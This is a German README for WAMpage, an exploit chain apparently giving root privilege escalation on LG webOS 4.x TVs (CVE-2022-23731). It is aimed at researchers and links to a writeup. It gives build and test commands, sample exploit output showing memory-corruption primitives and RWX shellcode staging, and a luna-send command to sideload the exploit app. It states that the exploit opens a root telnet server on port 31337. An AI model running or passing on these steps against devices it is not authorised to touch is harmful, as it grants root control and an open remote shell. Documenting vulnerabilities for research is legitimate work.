
WAMpage - Eine WebOS-Root-LPE-Exploitkette (CVE-2022-23731)
WAMpage - Eine WebOS Root LPE Exploit-Kette (CVE-2022-23731)
Dieser Exploit ist hauptsächlich für andere Forscher von Interesse – wenn Sie einfach nur Ihren Fernseher rooten möchten, möchten Sie wahrscheinlich RootMyTV, das einen zuverlässigen 1-Klick persistenten Root bietet.
Unterstützt derzeit nur WebOS 4.x auf 32-Bit-SoCs. Diese Software wird WIE BESEHEN bereitgestellt, Nutzung auf eigenes Risiko usw. usw.
Writeup: https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

Voraussetzungen:
apt install qemu-user
npm install -g @webosose/ares-cli
Kompilieren:
make
make test erstellt und führt den Exploit in d8 aus, das in qemu-arm läuft. (Eine vorcompilierte Version von d8 und seine Abhängigkeiten sind im bin/-Verzeichnis enthalten). Wenn der Exploit erfolgreich funktioniert, erhalten Sie wahrscheinlich etwas wie dieses:
[+] Starting WAMpage...
[+] addrof(myobj) = 0x5a68f5d1
[+] Test: reconstructed myobj: {"foo":"bar"}
[+] Set up arbread32/arbwrite32.
[+] stage2 shellcode loaded @ 0xff458000
[+] myfunc @ 0x5a693369
[+] stage1 RWX buf @ 0x5bb8f280
[+] Copied stage1 shellcode. Calling...
Traceback (most recent call last):
File "<stdin>", line 25, in <module>
IOError: [Errno 13] Permission denied: '/dev/mem'
Der Berechtigungsfehler ist erwartungsgemäß, vorausgesetzt Ihre Maschine ist nicht völlig falsch konfiguriert.
Sie können den devmemes.py-Exploit testen, indem Sie ihn direkt auf einem Fernseher ausführen, aber Sie benötigen entweder von Anfang an root oder eine andere Art von unsandboxed/unjailed Shell.
Sie können ares-install verwenden oder das IPK manuell kopieren und dies von der Entwicklermodus-Shell ausführen:
luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"tv.rootmy.wampage","ipkUrl":"/path/to/wampage.ipk","subscribe":true}'
Starten Sie die App und drücken Sie die Schaltfläche „Exploit starten". Wenn alles gut geht, sollte ein Telnet-Server auf Port 31337 geöffnet werden.